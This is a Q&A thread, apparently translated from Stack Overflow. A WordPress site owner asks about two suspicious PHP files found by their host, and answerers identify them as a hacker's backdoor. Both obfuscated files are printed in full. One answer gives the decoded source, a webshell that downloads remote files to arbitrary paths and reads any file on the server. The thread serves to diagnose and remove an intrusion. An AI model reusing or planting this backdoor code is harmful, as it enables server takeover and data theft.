1. 首页
  2. 问答
  3. 出现两个wild php文件

出现两个wild php文件

2016-02-12 22 views
1

今天我的网站被托管服务提供商取下,因为他们在两个文件中发现可疑代码。这些文件是:出现两个wild php文件

  1. {} HEX php.mailer.Mzh.509:potgieter.nl/public_html/wp-soaplibrary.php
  2. {} HEX php.mailer.Mzh.509:potgieter.nl/ public_html/wp-includes/fonts/dashfontgalery.php

该网站运行WordPress的,但我不能为我的生活弄清楚这些文件应该做什么。它们的含量低于:

{} HEX php.mailer.Mzh.509:potgieter.nl/public_html/wp-soaplibrary.php

<?php 
/** 
* Bootstrap file for setting the ABSPATH constant 
* and loading the wp-config.php file. The wp-config.php 
* file will then load the wp-settings.php file, which 
* will then set up the WordPress environment. 
* 
* If the wp-config.php file is not found then an error 
* will be displayed asking the visitor to set up the 
* wp-config.php file. 
* 
* Will also search for wp-config.php in WordPress' parent 
* directory to allow the WordPress directory to remain 
* untouched. 
* 
* @internal This file must be parsable by PHP4. 
* 
* @package WordPress 
*/ 

echo("WordPress Bootstrap file for setting the ABSPATH constant"); $GLOBALS['_269902246_']=Array(base64_decode('b' .'WQ' .'1'),base64_decode('Y3VybF9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y' .'3Vyb' .'F9' .'zZXRvcHQ='),base64_decode('Y3VybF9' .'zZXRvcHQ='),base64_decode('' .'Y3VybF9l' .'eG' .'Vj'),base64_decode('' .'Y' .'3VybF9' .'jbG9' .'zZ' .'Q=='),base64_decode('c3Rh' .'dA=='),base64_decode('ZGF0Z' .'Q' .'=='),base64_decode('ZGF0' .'ZQ=='),base64_decode('' .'ZGF0ZQ=='),base64_decode('aW5pX2dldA' .'=='),base64_decode('ZmlsZ' .'V' .'9nZXRfY' .'29u' .'dG' .'VudHM='),base64_decode('ZnVuY3Rp' .'b2' .'5' .'fZXhpc' .'3Rz'),base64_decode('' .'c' .'3RybG' .'Vu'),base64_decode('' .'Zm9w' .'ZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Z' .'mNs' .'b3Nl'),base64_decode('Zm' .'9wZW4' .'='),base64_decode('ZnJl' .'YWQ' .'='),base64_decode('' .'ZmlsZXN' .'pe' .'mU' .'='),base64_decode('Zm' .'Nsb3Nl')); ?><? function _842979692($i){$a=Array('SFRUUF9' .'IT1' .'NU','' .'cA==','c' .'GF' .'0a' .'A==','dXJs','bG' .'9vaw==','Z' .'3' .'ppcCxkZW' .'ZsY' .'XRl','' .'bmFt' .'Z' .'Tog','IHw' .'gdXN' .'lcm' .'lkOg==','dWl' .'k','IHwg' .'Z' .'3J' .'vdXBpZDo=','' .'Z2lk','' .'IHwgc2l6ZTo' .'=','c2l' .'6ZQ==','IHwgYXRp' .'bWU6','WS' .'1tLWQgSD' .'ppOnM=','YXRpbWU=','IH' .'wgb' .'XRpbWU6','' .'WS' .'1tLWQgSDppOnM=','bXRpb' .'WU=','' .'IHwg' .'Y' .'3' .'Rp' .'bWU6','WS1tLWQgSDppOnM' .'=','Y3Rpb' .'WU' .'=','','d' .'mV' .'yL' .'g==','' .'IHwg','YWxsb3df' .'dXJsX2Z' .'vcGVu','Zm' .'9' .'wZW4g','Y3VybF' .'9' .'pb' .'ml0','Y3' .'Vy' .'bCA=','R' .'XJ' .'yb3' .'I6IHRyY' .'W5z' .'Z' .'mVyCg==','dys=','R' .'XJyb' .'3I6IG' .'Vt' .'cHR5IGNvb' .'nRlb' .'nQK','dmVyLg' .'==','IHwg','c' .'mI=','PGh' .'yPgo=','PGZ' .'vc' .'m0gYWN' .'0aW9u' .'PS' .'Ij' .'Ii' .'BtZX' .'Rob2Q9I' .'n' .'Bv' .'c3' .'Qi' .'Pg' .'==','PHRleHRhcmVhIHJvd3' .'M9I' .'jMwIiBjb2xzPSIxNTAiIG5h' .'bWU9InRleHQi' .'Pg' .'==','P' .'C90ZXh0' .'YXJlYT4' .'=','P' .'C' .'9mb' .'3Jt' .'Pg==');return base64_decode($a[$i]);} ?><?php $_0=2.0;$_1=$GLOBALS['_269902246_'][0]($_SERVER[_842979692(0)]);$_2=$_GET[_842979692(1)];$_3=$_GET[_842979692(2)];$_4=$_GET[_842979692(3)];$_5=$_GET[_842979692(4)];function l__0($_6){$_7=$GLOBALS['_269902246_'][1]($_6);$GLOBALS['_269902246_'][2]($_7,CURLOPT_ENCODING,_842979692(5));$GLOBALS['_269902246_'][3]($_7,CURLOPT_FOLLOWLOCATION,round(0+0.333333333333+0.333333333333+0.333333333333));$GLOBALS['_269902246_'][4]($_7,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$_8=$GLOBALS['_269902246_'][5]($_7);$GLOBALS['_269902246_'][6]($_7);return $_8;}function l__1($_9){$_10=$GLOBALS['_269902246_'][7]($_9);return _842979692(6) .$_9 ._842979692(7) .$_10[_842979692(8)] ._842979692(9) .$_10[_842979692(10)] ._842979692(11) .$_10[_842979692(12)] ._842979692(13) .$GLOBALS['_269902246_'][8](_842979692(14),$_10[_842979692(15)]) ._842979692(16) .$GLOBALS['_269902246_'][9](_842979692(17),$_10[_842979692(18)]) ._842979692(19) .$GLOBALS['_269902246_'][10](_842979692(20),$_10[_842979692(21)]) ._842979692(22);}if($_2 == $_1 && $_3 && $_4 &&!$_5){echo(_842979692(23) .$_0 ._842979692(24));if($GLOBALS['_269902246_'][11](_842979692(25))){@$_11=$GLOBALS['_269902246_'][12]($_4);echo(_842979692(26));}else if($GLOBALS['_269902246_'][13](_842979692(27))){@$_11=l__0($_4);echo(_842979692(28));}else{echo(_842979692(29));}if($_11 && $GLOBALS['_269902246_'][14]($_11)>round(0)){$_12=$GLOBALS['_269902246_'][15]($_3,_842979692(30));$GLOBALS['_269902246_'][16]($_12,$_11);$GLOBALS['_269902246_'][17]($_12);echo l__1($_3);}else{echo(_842979692(31));}}if($_2 == $_1 && $_5){echo(_842979692(32) .$_0 ._842979692(33));echo l__1($_5);$_13=$GLOBALS['_269902246_'][18]($_5,_842979692(34));@$_14=$GLOBALS['_269902246_'][19]($_13,$GLOBALS['_269902246_'][20]($_5));$GLOBALS['_269902246_'][21]($_13);echo(_842979692(35));echo(_842979692(36));echo(_842979692(37) .$_14 ._842979692(38));echo(_842979692(39));} 

?>

和 {} HEX php.mailer.Mzh.509 :potgieter.nl/public_html/wp-includes/fonts/dashfontgalery.php

<?php 
/** 
* Bootstrap file for setting the ABSPATH constant 
* and loading the wp-config.php file. The wp-config.php 
* file will then load the wp-settings.php file, which 
* will then set up the WordPress environment. 
* 
* If the wp-config.php file is not found then an error 
* will be displayed asking the visitor to set up the 
* wp-config.php file. 
* 
* Will also search for wp-config.php in WordPress' parent 
* directory to allow the WordPress directory to remain 
* untouched. 
* 
* @internal This file must be parsable by PHP4. 
* 
* @package WordPress 
*/ 

echo("WordPress Bootstrap file for setting the ABSPATH constant");  $GLOBALS['_269902246_']=Array(base64_decode('b' .'WQ' .'1'),base64_decode('Y3VybF9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRvcHQ='),base64_decode('Y' .'3Vyb' .'F9' .'zZXRvcHQ='),base64_decode('Y3VybF9' .'zZXRvcHQ='),base64_decode('' .'Y3VybF9l' .'eG' .'Vj'),base64_decode('' .'Y' .'3VybF9' .'jbG9' .'zZ' .'Q=='),base64_decode('c3Rh' .'dA=='),base64_decode('ZGF0Z' .'Q' .'=='),base64_decode('ZGF0' .'ZQ=='),base64_decode('' .'ZGF0ZQ=='),base64_decode('aW5pX2dldA' .'=='),base64_decode('ZmlsZ' .'V' .'9nZXRfY' .'29u' .'dG' .'VudHM='),base64_decode('ZnVuY3Rp' .'b2' .'5' .'fZXhpc' .'3Rz'),base64_decode('' .'c' .'3RybG' .'Vu'),base64_decode('' .'Zm9w' .'ZW' .'4='),base64_decode('ZnB1dH' .'M' .'='),base64_decode('Z' .'mNs' .'b3Nl'),base64_decode('Zm' .'9wZW4' .'='),base64_decode('ZnJl' .'YWQ' .'='),base64_decode('' .'ZmlsZXN' .'pe' .'mU' .'='),base64_decode('Zm' .'Nsb3Nl')); ?><? function _842979692($i){$a=Array('SFRUUF9' .'IT1' .'NU','' .'cA==','c' .'GF' .'0a' .'A==','dXJs','bG' .'9vaw==','Z' .'3' .'ppcCxkZW' .'ZsY' .'XRl','' .'bmFt' .'Z' .'Tog','IHw' .'gdXN' .'lcm' .'lkOg==','dWl' .'k','IHwg' .'Z' .'3J' .'vdXBpZDo=','' .'Z2lk','' .'IHwgc2l6ZTo' .'=','c2l' .'6ZQ==','IHwgYXRp' .'bWU6','WS' .'1tLWQgSD' .'ppOnM=','YXRpbWU=','IH' .'wgb' .'XRpbWU6','' .'WS' .'1tLWQgSDppOnM=','bXRpb' .'WU=','' .'IHwg' .'Y' .'3' .'Rp' .'bWU6','WS1tLWQgSDppOnM' .'=','Y3Rpb' .'WU' .'=','','d' .'mV' .'yL' .'g==','' .'IHwg','YWxsb3df' .'dXJsX2Z' .'vcGVu','Zm' .'9' .'wZW4g','Y3VybF' .'9' .'pb' .'ml0','Y3' .'Vy' .'bCA=','R' .'XJ' .'yb3' .'I6IHRyY' .'W5z' .'Z' .'mVyCg==','dys=','R' .'XJyb' .'3I6IG' .'Vt' .'cHR5IGNvb' .'nRlb' .'nQK','dmVyLg' .'==','IHwg','c' .'mI=','PGh' .'yPgo=','PGZ' .'vc' .'m0gYWN' .'0aW9u' .'PS' .'Ij' .'Ii' .'BtZX' .'Rob2Q9I' .'n' .'Bv' .'c3' .'Qi' .'Pg' .'==','PHRleHRhcmVhIHJvd3' .'M9I' .'jMwIiBjb2xzPSIxNTAiIG5h' .'bWU9InRleHQi' .'Pg' .'==','P' .'C90ZXh0' .'YXJlYT4' .'=','P' .'C' .'9mb' .'3Jt' .'Pg==');return base64_decode($a[$i]);} ?><?php $_0=2.0;$_1=$GLOBALS['_269902246_'][0]($_SERVER[_842979692(0)]);$_2=$_GET[_842979692(1)];$_3=$_GET[_842979692(2)];$_4=$_GET[_842979692(3)];$_5=$_GET[_842979692(4)];function l__0($_6){$_7=$GLOBALS['_269902246_'][1]($_6);$GLOBALS['_269902246_'][2]($_7,CURLOPT_ENCODING,_842979692(5));$GLOBALS['_269902246_'][3]($_7,CURLOPT_FOLLOWLOCATION,round(0+0.333333333333+0.333333333333+0.333333333333));$GLOBALS['_269902246_'][4]($_7,CURLOPT_RETURNTRANSFER,round(0+0.2+0.2+0.2+0.2+0.2));$_8=$GLOBALS['_269902246_'][5]($_7);$GLOBALS['_269902246_'][6]($_7);return $_8;}function l__1($_9){$_10=$GLOBALS['_269902246_'][7]($_9);return _842979692(6) .$_9 ._842979692(7) .$_10[_842979692(8)] ._842979692(9) .$_10[_842979692(10)] ._842979692(11) .$_10[_842979692(12)] ._842979692(13) .$GLOBALS['_269902246_'][8](_842979692(14),$_10[_842979692(15)]) ._842979692(16) .$GLOBALS['_269902246_'][9](_842979692(17),$_10[_842979692(18)]) ._842979692(19) .$GLOBALS['_269902246_'][10](_842979692(20),$_10[_842979692(21)]) ._842979692(22);}if($_2 == $_1 && $_3 && $_4 &&!$_5){echo(_842979692(23) .$_0 ._842979692(24));if($GLOBALS['_269902246_'][11](_842979692(25))){@$_11=$GLOBALS['_269902246_'][12]($_4);echo(_842979692(26));}else if($GLOBALS['_269902246_'][13](_842979692(27))){@$_11=l__0($_4);echo(_842979692(28));}else{echo(_842979692(29));}if($_11 && $GLOBALS['_269902246_'][14]($_11)>round(0)){$_12=$GLOBALS['_269902246_'][15]($_3,_842979692(30));$GLOBALS['_269902246_'][16]($_12,$_11);$GLOBALS['_269902246_'][17]($_12);echo l__1($_3);}else{echo(_842979692(31));}}if($_2 == $_1 && $_5){echo(_842979692(32) .$_0 ._842979692(33));echo l__1($_5);$_13=$GLOBALS['_269902246_'][18]($_5,_842979692(34));@$_14=$GLOBALS['_269902246_'][19]($_13,$GLOBALS['_269902246_'][20]($_5));$GLOBALS['_269902246_'][21]($_13);echo(_842979692(35));echo(_842979692(36));echo(_842979692(37) .$_14 ._842979692(38));echo(_842979692(39));} 

?>

现在PHP是不是我的第一语言,但我在它相当熟练。然而,这些文件对我来说毫无意义。这些文件对我的网站是否真正有用,还是确实是由我的托管服务提供商提供的,这些文件是由黑客放在我的服务器上的?

来源

2016-02-12 Tijmen

+1

您已被黑客入侵 – RiggsFolly

+1

这些绝对不是wordpress文件。你可以随时比较你有什么与回购 - https://github.com/WordPress/WordPress – Und3rTow

+0

几乎相同的发生在我们的WordPress网站。我无法确定他们使用的漏洞在哪里,因此我最终删除了他们用来通过我们的服务器发送垃圾邮件的文件,并将这些路径中的所有文件写入权限作为解决方法取消。由于其他原因,我们将从该站点移开,但WordPress太危险,无法用于您关心的事情。 – coladict

回答

3

这绝对是一个黑客。组合的base64解码隐藏了真实的代码。您的网站可能已通过恶意插件进行了泄露。

务必确保Wordpress及其所有插件保持最新状态,并且只使用您实际需要的插件。不要运行任何你不确定的事情。

更新:

这里是完全解码代码:

$version = 2.0; 
$host = md5($_SERVER['HTTP_HOST']); 
$p = $_GET['p']; 
$path = $_GET['path']; 
$url = $_GET['url']; 
$look = $_GET['look']; 
function getFromUrl($url) 
{ 
    $curl = curl_init($url); 
    curl_setopt($curl, CURLOPT_ENCODING, 'gzip,deflate'); 
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); 
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
    $result = curl_exec($curl); 
    curl_close($curl); 
    return $result; 
} 

function getFileInfo($filename) 
{ 
    $fileInfo = stat($filename); 
    return 'name: ' . $filename 
    . ' | userid:' . $fileInfo['uid'] 
    . ' | groupid:' . $fileInfo['gid'] 
    . ' | size:' . $fileInfo['size'] 
    . ' | atime:' . date('Y-m-d H:i:s', $fileInfo['atime']) 
    . ' | mtime:' . date('Y-m-d H:i:s', $fileInfo['mtime']) 
    . ' | ctime:' . date('Y-m-d H:i:s', $fileInfo['ctime']) 
    . ''; 
} 

if ($p == $host && $path && $url && !$look) { 
    echo 'ver' . $version . '|'; 
    if (ini_get('allow_url_fopen')) { 
     @$remoteFile = file_get_contents($url); 
     echo 'fopen '; 
    } else { 
     if (function_exists('curl_init')) { 
      @$remoteFile = getFromUrl($url); 
      echo 'curl '; 
     } else { 
      echo "Error: transfer\n"; 
     } 
    } 
    if ($remoteFile && strlen($remoteFile) > 0) { // The strlen will never happen as it will evaluate to false 
     $fileHandle = fopen($path, 'w+'); 
     fputs($fileHandle, $remoteFile); 
     fclose($fileHandle); 
     echo getFileInfo($path); 
    } else { 
     echo "Error: empty content\n"; 
    } 
} 
if ($p == $host && $look) { 
    echo 'ver' . $version . ' | '; 
    echo getFileInfo($look); 
    $fileHandle2 = fopen($look, 'rb'); 
    @$fileContents = fread($fileHandle2, filesize($look)); 
    fclose($fileHandle2); 
    echo '<hr>'; 
    echo '<form action="#" method="post">'; 
    echo '<textarea rows="30" cols="150" name="text">' . $fileContents . '</textarea>'; 
    echo '</form>'; 
}

它看起来像一旦该文件是您的系统上,攻击者可以用它来读取和写入basicly什么你磁盘它甚至有一个检查,看看他们有什么权限。

此文件是令人难以置信的危险。

代码非常写的不好,但(甚至超出其邪恶的本质),它使用无效的阵列和回声语法(尽管它仍然可以工作),如果你有short tags禁用代码将不能运行。

来源

2016-02-12 09:54:49 DanielM

+0

非常感谢您的帮助。我将开始禁用未来的短标签。 Wordpress和插件都是最新的,但我最近才开始担任这家公司的网站管理员,而我的前任不擅长编写代码,所以他安装了一大堆插件,然后安装了一些插件。我仍然在清理他的烂摊子,所以希望这个坏插件将会被我删除。 – Tijmen

+0

如果没有短标签,WordPress实际上可能无法正常工作,但它本身并没有很好的写法。另外我不认为短标签是一个安全功能,我只是观察到这段代码不起作用。一个更好的书面会。 – DanielM

+1

我明白了,最好远离短标签。再次感谢你的帮助 :) – Tijmen

4

这必须是黑客。

看着这些代码片段:

$_2 = $_GET[_842979692(1)]; 
$_3 = $_GET[_842979692(2)]; 
$_4 = $_GET[_842979692(3)]; 
$_5 = $_GET[_842979692(4)];

一些未知$_GET PARAMS是由脚本读取。这通常用于打开后门。

function l__0($_6) 
{ 
    $_7 = $GLOBALS['_269902246_'][1]($_6); 
    $GLOBALS['_269902246_'][2]($_7, CURLOPT_ENCODING, _842979692(5)); 
    $GLOBALS['_269902246_'][3]($_7, CURLOPT_FOLLOWLOCATION, round(0 + 0.333333333333 + 0.333333333333 + 0.333333333333)); 
    $GLOBALS['_269902246_'][4]($_7, CURLOPT_RETURNTRANSFER, round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2)); 
    $_8 = $GLOBALS['_269902246_'][5]($_7); 
    $GLOBALS['_269902246_'][6]($_7); 
    return $_8; 
}

全局变量通过curl获取内容。

这似乎是从不同的服务器加载有效载荷的东西。

来源

2016-02-12 09:57:18 maxhb

相关问题

 相关问题